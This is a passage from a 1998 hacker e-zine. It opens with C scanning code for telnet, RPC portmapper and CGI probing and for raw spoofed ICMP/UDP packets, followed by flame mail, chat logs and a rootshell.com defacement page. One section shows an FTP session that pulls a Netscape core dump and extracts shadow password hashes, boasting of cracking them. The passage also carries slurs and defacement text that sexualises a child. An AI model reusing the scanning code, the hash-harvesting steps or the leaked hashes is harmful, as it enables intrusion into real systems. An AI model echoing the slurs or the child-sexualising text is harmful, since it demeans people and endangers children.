echo.saddr; if(DEBUG == 1) printf("Packet read. with src address %s.\n",inet_ntoa(this_is_bs)); if(echo.saddr == ip) { return echo.daddr; } time(&temp); /* if we received a icmp echo packet from the host that * wasn't a response to our packet, it still means the host * is up ;) */ return 0; } } /* DUH */ unsigned short in_cksum(unsigned short *ptr,int nbytes) { register long sum; /* assumes long == 32 bits */ u_short oddbyte; register u_short answer; /* assumes u_short == 16 bits */ /* * Our algorithm is simple, using a 32-bit accumulator (sum), * we add sequential 16-bit words to it, and at the end, fold back * all the carry bits from the top 16 bits into the lower 16 bits. */ sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } /* mop up an odd byte, if necessary */ if (nbytes == 1) { oddbyte = 0; /* make sure top half is zero */ *((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */ sum += oddbyte; } /* * Add back carry outs from top 16 bits to low 16 bits. */ sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* ones-complement, then truncate to 16 bits */ return(answer); } /* make a telnet connection to the ip address. */ telnetconnect (u_long ip) { int sockfd, done = 0, test; u_char buf[4]; if ((sockfd = connect_to_host (ip, 23)) == -1) return -1; /* terminal negotiation (bull)shit */ while (!done) { bzero(buf, sizeof(buf)); if (read (sockfd, buf, 1) != 1) { if(DEBUG) printf("coulndt read socket !@!@#$\n"); close (sockfd); return 0; } if(DEBUG)printf("%x\n", *buf); if (*buf == 0xff) /* 0xff == "interpret as command" in telnet.. */ { if (DEBUG) printf ("switch to inband signalling !\n"); test = read (sockfd, buf + 1, 2); /* read in the 2 byte command.. */ if (DEBUG) printf ("read %d more bytes !\n", test); if (*(buf + 1) == 253) /* 253 == "DO" in telnet. */ { *(buf + 1) = 252; /* 252 == "WONT" in telnet. */ if(DEBUG) printf("replying with WONT %d\n",*(buf+2)); write (sockfd, buf, 3); } } if((*(buf + 1) < (u_char)127) && (*(buf + 2) < (u_char)127) && (*(buf + 3) < (u_char)127)) return sockfd; } } /* i read the rpcinfo source c0de and it goes through a whole long thing creating a client and calling the portmapper.. maybe solaris doesnt have pmap_getmaps()? anyways, i decided to split up the rpc routines into 3 functions so that we'll only have to query the portmapper once for any given host.. rpcinfo() gets the portmap, checkrpc() searches the portmap list for a given service, and printrpc() prints the entire list ala rpcinfo:) */ struct pmaplist * rpcinfo (u_long host) { struct sockaddr_in sheep; static struct pmaplist *head; /* linked list returned by pmap_getmaps .. */ sheep.sin_family = AF_INET; sheep.sin_port = htons (111); /* sunrpc ;) */ sheep.sin_addr.s_addr = host; head = pmap_getmaps (&sheep); return head; } /* that was easy =P */ int checkrpc (struct pmaplist *head, char *prog) { struct rpcent *service; /* for prognum -> ascii lookup */ if (head == NULL) return 0; while (head != NULL) { head = head->pml_next; /* next member of the linked list */ /* resolve the program number to a string */ if ((service = getrpcbynumber (head->pml_map.pm_prog)) != NULL) if (strcmp (prog, service->r_name) == 0) return 1; if (head->pml_next == NULL) return 0; } } int printrpc (struct pmaplist *head, u_long ip) { void ret(int signo) { return; } struct rpcent *service; /* for prognum -> ascii lookup */ printf ("\n\n-** RPC services responding on host %s\n", inet_ntoa (ip)); if (head == NULL) { printf ("[ NONE ! ]\n"); return 0; } while (head != NULL) { head = head->pml_next; /* next member of the linked list */ /* resolve the program number to a string */ if ((service = getrpcbynumber (head->pml_map.pm_prog)) != NULL) printf ("-** [prog. name -> %s] [port -> %d(%s)] [vers. -> %d]\n", service->r_name, head->pml_map.pm_port, (head->pml_map.pm_prot == 6) ? "tcp" : "udp", head->pml_map.pm_vers); if (head->pml_next == NULL) { return 0; } } } /* compare *reply with the received data after requesting some html =) */ int check_cgi(u_long host, char *path, char *reply) { void ret2(int signo) { return; } int sockfd; char sendstring[32], recvstring[1028]; sysv_signal(SIGALRM, ret2); sprintf(sendstring, "GET %s\r\n", path); sockfd = connect_to_host(host, 80); alarm(0); alarm(5); write(sockfd, sendstring, sizeof(sendstring)); read(sockfd, recvstring, sizeof(recvstring)); alarm(0); if(strstr(recvstring, reply) != NULL) return 1; return 0; } /* .. *data limited to 1028 bytes, or this function will stack overflow (not good heh) */ /* REMEMBER TO ADD IN_CKSUM() .. IT IZ NECESSARY FOR ICMP */ int send_raw_icmp(u_long saddr, u_long daddr, u_short type, u_short code, void *d4t4) { int sockfd; struct sockaddr_in sheep; struct p4ck3t { struct iphdr ip; struct icmphdr icmp; char d4t4[1028]; }p4ck3t; bzero(&p4ck3t, sizeof(p4ck3t)); /* fillin ip header */ sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = daddr; p4ck3t.ip.saddr = saddr; p4ck3t.ip.daddr = daddr; p4ck3t.ip.ihl = 5; p4ck3t.ip.version = 4; p4ck3t.ip.tos = 0x0; p4ck3t.ip.id = 0xb4; p4ck3t.ip.protocol = IPPROTO_UDP; p4ck3t.ip.check = 0; /* the kernel does this for us */ p4ck3t.ip.ttl = 255; p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4)); p4ck3t.icmp.code = code; p4ck3t.icmp.type = type; p4ck3t.icmp.checksum = in_cksum((unsigned short *)&p4ck3t.icmp, sizeof(struct icmphdr)); memcpy(p4ck3t.d4t4, d4t4, sizeof(d4t4)); if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) return -1; sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep, sizeof(struct sockaddr_in)); } /* no-checksum raw UDP */ int send_raw_udp(u_long saddr /* network */, u_long daddr /* "" */, u_short uh_sport /* host */,u_short uh_dport /* host */, void *d4t4) { struct udphdr { u_int16_t uh_sport; /* source port */ u_int16_t uh_dport; /* destination port */ u_int16_t uh_ulen; /* udp length */ u_int16_t uh_sum; /* udp checksum */ }; int sockfd; struct sockaddr_in sheep; struct p4ck3t { struct iphdr ip; struct udphdr udp; char d4t4[1028]; }p4ck3t; bzero(&p4ck3t, sizeof(p4ck3t)); /* fillin ip header */ sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = daddr; sheep.sin_port = htons(uh_dport); p4ck3t.ip.saddr = saddr; p4ck3t.ip.daddr = daddr; p4ck3t.ip.ihl = 5; p4ck3t.ip.version = 4; p4ck3t.ip.tos = 0x0; p4ck3t.ip.id = 0xb4; p4ck3t.ip.protocol = IPPROTO_UDP; p4ck3t.ip.check = 0; /* the kernel does this for us */ p4ck3t.ip.ttl = 255; p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4)); p4ck3t.udp.uh_sport = htons(uh_sport); p4ck3t.udp.uh_dport = htons(uh_dport); p4ck3t.udp.uh_ulen = htons(sizeof(struct udphdr) + sizeof(d4t4)); memcpy(p4ck3t.d4t4,d4t4, sizeof(d4t4)); if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) return -1; sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep, sizeof(struct sockaddr_in)); return; } -------------------------------------------------------------------------- 0x0C - Network TIC TAC TOE -------------------------------------------------------------------------- YES! network tic tac toe! this kept me occupied for hours prior to the release of this issue. br0ked code got you down? take a break and play this for a few hours. Compiles fine on BSD/Linux see included nttt.c silly. -------------------------------------------------------------------------- 0x0D - P0ST4L M4DN3SS YO -------------------------------------------------------------------------- To: george@b4b0.org From: John Vranesevich Greetings: You and your group's "uber leet zine" are hardly in ANY position to be criticizing anyone else. The immaturity pouring out of that size and zine is astounding. Take a look in the mirror before you start putting down the work being done by others. Yours In CyberSpace, John Vranesevich Founder, AntiOnline At 02:25 AM 10/10/98 -0400, you wrote: >Below Is A Message From AntiOnline's Comment Form. >--------------------------------------------------------------------------- > >This form was submitted by: george@b4b0.org. >Who runs the following website: www.b4b0.org >And is the janitor in chief for b4b0 inc. >You can email at: > Submitted The Following Comments/Questions: > >uh your gay and a contradictive bastard. > >jorge. > >End Of Automated Message From AntiOnline > b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 To: "George A. Krendle" From: John Vranesevich Greetings: That little rant of yours sounded very much like you promote security through obscurity? Are you saying there's no value in posting exploits? That's archaic thinking that the vast majority of professionals in the field, and groups like l0pht, would disagree with whole heartily. You will see no childish flames about your little "group" on my site. As for any childish flames about me being posted in your zine. So be it. There's an old saying that goes something like "there's no such thing as bad publicity." More people see my site in a one minute time frame than will see your zine in an entire year. I must be doing something right, huh? Yours In CyberSpace, John Vranesevich Founder, AntiOnline b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 To: "b4b0" From: "Shredder Sledder" b4b0, Enclosed is a letter I wrote to John Vransevich right after his ignorant and uninformed "editorial" on script kiddies showed up on his web site. I had noticed that in a past issue of b4b0 that you had mentioned something about him not publishing letters that were negative about him, enlightened, and truthful as to what antionline is. I'd like to say that I've been ignored too. Here is what I wrote that pathetic loser, if you could share it with the rest of the world, justice would be served. JP didn't publish it in his last mailbag and frankly, somebody needs to slap some sense into that boy. "John, Maybe you should hand over your "editorials" and everything else you "publish" to an adult to proofread. Your constant misspellings and bad grammar make your "stories" appear to be written by an idiot. Also being a 19 year old college drop-out is no excuse. I know plenty of college drop-outs that can express themselves well. (Besides the journalists at wired laugh behind your back about your site when they read badly written stuff.) This letter isn't about spelling however. Being older and a well paid computer professional is nice for me also (I have a life and stopped living at my parents house by the age of 18, Ahem!), but not my point. I've got a little more depth in my viewpoint on hackers, a more historical and realistic one than you seem to have. 1) It is a riot to see you write things condemning "script kiddies" when: A) They are your sole source of news B) They form a majority of your "readership" &C) They probably understand a lot more about technical things than you do. 2) You have absolutely NO historical perspective about hackers. You seem to have failed to read even back issues of Phrack, much less other enlightening efforts such as FEH or possibly Citadel666. Have you ever read books such as "The Watchman" or "Out of the Inner Circle"? It would seem not. Do you have perspective on what people used to do, versus what they do now? Again - NO! Real hackers (except for Halflife and maybe some of the b4b0 guys)do not exist on Undernet. Have you ever heard of r00t? What about things that they and a number of other folks (some of the EFnet #hack crowd and others who don't IRC at all) did over the last 4-5 years? These people haven't left the "scene" entirely. In fact, most of them have well paying jobs. They, unlike you, publish half-decent quality technical information and can afford to fly to Defcon (again unlike you). In fact, these are the kind of guys who write their own drivers for linux and free BSD while taunting Shimomura on another phone line, maintain a presence on IRC, and work a real job. They frequently party with and travel to see friends they hang with on the net. The problem isn't completely with all of the "script kiddies" out there. It is also with people like you, who claim to be above it all and yet are no different. Unfortunately for you, you don't know any better. Maybe when you talk to real hackers and educate yourself, you have something to say worth reading. Sledder" I'd like to remind JP that a Boutonniere of stupidity is something that an idiot like him can wear all day without the fear of it fading - Sledder -------------------------------------------------------------------------- 0x0E - B4B0 Headlines -------------------------------------------------------------------------- 10-28-98: www.rootshell.com g0t owned. they claim the introoderz gained access through sshd 1.2.26, but we all know thatz just a big joke right? letz take a look sh4ll we: For all you lamers: Justin Foutts = p-wInd0wz = prym To: BUGTRAQ@NETSPACE.ORG Subject: SSHD Exploit Please respond to Justin Foutts On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems. I STRONGLY recommend that everyone upgrade their versions of sshd as soon as possible. Thanks! Justin Start of p-wind0wz buffer: Tue Nov 03 21:25:41 1998 Session Ident: p-wInd0Wz (~p@HIHIHI.YOYOYO.ORG) On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems. I STRONGLY recommend that everyone upgrade their ve AHAHAHAHAHAHAHAHAHA you lame fuck [21:17] i rule [21:17] wait till u see the next post I wonder why aleph1 would even let that post [21:17] haha [21:17] me too [21:17] ive got like 200 mailz [21:18] it rulez [21:18] im replying to all the chix [21:19] mudge will posot about math bugs soon l33t [21:19] i dont think aleph1 forward my neext post [21:19] it ruled [21:19] "just joking about sshd guyz! gotcha!@" [21:19] heoahoa [21:19] oh man [21:19] i love bugtraq [21:20] tell everyone i sent u warez [21:20] and that they work perfectly [21:20] perpetu8 it ok werd!! tell them u sent it to me [21:21] tell who? everyone like i'm the only one who got them [21:22] i think everyone realizes its coomplete bullshit [21:22] it has been since the begining well [21:22] those rootshell people are so dumb ppl have been asking #2600 [21:22] dcc me.. dont be lying nigger [21:22] im auto banned from there [21:22] hahahahahah [21:22] man [21:22] everyoone is so dumb no i promised not to give it out [21:22] umm.. its me [21:23] tell him yyoiull give him warez if he gives up his religion End of p-wind0wz buffer Tue Nov 03 21:25:41 1998 HOHO. THATZ WHAT U THINK. -rw------- 1 qytpo qytpo 5095 Nov 6 15:11 ownsshd.c ok4y anyway, here iz a copy of the hacked webpage for h1st0rical reference. y0y0y0, u all m4y b w0nd3r1ng wh3r3 th3 k-sp1ff r00tsh3ll sYt3 w3nt. w3ll. 1t'z 4 l0ng st0rY.. s3v3r4l nYt3z ag0, eY3 l4y 1n b3d p0nd3r1ng. and wh4t wUz ey3 p0nd3r1ng, u a$k? eYe wUz th1nk1ng ab0Ut h0w kUt3 mY n3xt d0or n31ghb0r'z sm4ll m4l3 ch1ld l00k3d n4k3d. bUt m0$tly, eYe b3g4n t0 h4v3 d0UbtZ 4s t0 th3 r34s0n ph()r mY 3x1st3nc3... eYe wUz th1nking t0 mY$3lf..k1t, eY3 s3z t0 mY 0h-s0-v3ry-g4y s3lf, y 1z it that eY3 h4v3 b33n pUt 0n th1s 34rth? 1z lYph3 r1lly 4ll ab0Ut pr0v1d1ng bUgtr4q skr1Ptz ph0r k-l4m3 t4rdZ sUch 4z th3 HFG g1mpZ, kn0wn ph0r th31r ph34r$0m3 HTML t4GZ & ab1l1ty t0 c0nsUm3 sm4ll h3rdz 0f k0Wz 1n a s1ngl3 s1tt1ng? 1n sh0rt, n0. 1'm g01ng t0 r3t1r3 4nd b3c0m3 a sc0Utm4zt3r, m4yb3 a m4l3 b4bys1tt3r. -k1t kn0x out p.s. 0h y4h, phr33 m1tn1ck. p.p.s. h3y u ant10nl1n3 f4gg0t w1th th3 fUnnY l4zt n4m3.. u'r3 n3xt. sh0ut 0uTz t0: MOD - Masters of Dropstat - 1m n0t sUr3 1ph 3y3 m34n th3 0ld M0D 0r th3 gNu 0n3. 1m n0t sUr3 th3r3'z a d1ff3r3nc3. BoW - Brotherhood of Webmasters - w3 lUv y0u. err n0, w3 h8 y0u. h3lp, 1m b1-p0l4r. TNo - The Newbie Order - v0yl4m3r 4nd d1s k4n sh4r3 c3llZ w1th m3rc ph0r th31r 1nd3x.htMl krYm3z HFG - Heavy Frightened Girliemen - sUr3ly th3 sUpr3m3 HTML j0ck3yZ 0f th3.. m0nth. l34rn1ng h0w t0 h1d3 str1nGz 1n '98!@# LOD - Legion of DOS - dir --help? fUk th1s shYt, l3tz n4rk 34ch 0th3r!@# r00t - 1ph y0u'r3 n0t 0wn3d bY r00t, 1nst4ll slAkw4r3 3.o 4nd lYk3, g1v3 uZ th3 r00t p4zZw3rd, n shYt. 0r 3lz3 w3'll b4n y00!@$ CDC - Cult 0f the Dum asCii - mUdg3 r1t3z w4r3z 4nd th3 r3zt 0f uZ w3rk 0n "h0w t0 bl0w Up th3 t01l3t p4rt ][ - app34r1ng 0n g3r4ld0." 0ur l1ghts1d3 h0M3b0yZ: Secure Networks Inc. - wh1t3 p0w3r r3j3kt g3tz r1ch 0ff 0f p4th3t1c n3rd w1th 1nf3r10r1ty k0mpl3x wh1l3 uZ1ng h1z skr1ptz t0 h4q .edUz 1n .ca. st0ry @ 11. ISS - wh3r3 th3 m41l sp00lZ & w4r3z r a m4tt3r 0f pUbl1k r3k0rd Tsutomu Shimomura - th4nx ph0r th3 C3ll K0d3zZ d00d!@# D.J. Bernstein - th4nx ph0r 8.9.1. Eric Allman - th4nx ph0r 8.9.1. w3'd g1v3 sUm r34l sh0Ut 0utz, bUt 3v3ry0n3 1n th3 sc3n3 1z fUqn g4y c0mp4r3d t0 uZ, 4nd 1t'd b s0mewh4t p01ntl3Zz t0 sh0Ut t0 0urs3lv3z. sm00ch. h3y. u d1dnt th1nk w3'd l34v3 y0U w1t n0 w4r3z, d1d y0u!?@ w3'r3 n0t l1k3 th4t.. h3r3'z th3 0-dAy: Exploits Browse 1998: July June May April March February January Browse 1997: December November October September August July and before - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - w0rd to this- i bet this core file is STILL on their root ftp dir. # ftp ftp29.netscape.com Connected to ftp29.netscape.com. 220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready. Name (ftp29.netscape.com:root): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome to the Netscape Communications Corporation FTP server. 230- 230-If you have any odd problems, try logging in with a minus sign (-) 230-as the first character of your password. This will turn off a feature 230-that may be confusing your ftp client program. 230- 230-Please send any questions, comments, or problem reports about 230-this server to ftp@netscape.com. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for *ls. l--x--x--x 1 ftp ftp 512 Aug 05 1997 bin -> /usr/bin -rw-rw-rw- 1 ftp ftp 363476 Oct 21 09:47 core dr-xr-xr-x 1 ftp ftp 512 Aug 05 1997 dev d--x--x--x 1 ftp ftp 512 Feb 05 1998 etc drwxr-xr-x 1 ftp ftp 512 Nov 04 14:34 pub drwxr-xr-x 1 ftp ftp 512 Aug 05 1997 usr 226 ASCII Transfer complete. ftp> get core local: core remote: core 200 PORT command successful. 150 Opening BINARY mode data connection for core (363476 bytes). 226 BINARY Transfer complete. 363476 bytes received in 3.72 seconds (97679 bytes/s) ftp> quit 221 Goodbye. # strings core|grep ::: root:gMnAz2onDsMdg:10362:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: http:x:9717:::::: dist:RPN6AIAuNLgvI:10500:::::: ftp:x:9791:::::: ftp-dist:x:9791:::::: rdist:x:9717:::::: h0h0. w3 h4ve 0ur network of 2000 p2-450'z cracking the root str1ng. fe4r. H0W3V3R it would be n1ce to know why ftpd dumped c0re in the first place. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #### ######### ## # ## # # # # # ## # # ### # ##### #### ######### ## ## # # # ## ## ## ######### #### ## ################### ##################### ## #### ##### b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! [ (c) 1998 The B4B0 Party Programme All Rights Reserved Yo. ] [ n0 article or piece of source code from this magazine ] [ is to be distributed without the entire issue in its entirety. ] [ y3s. we're t4lking to *y0u* rootshell. ] b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!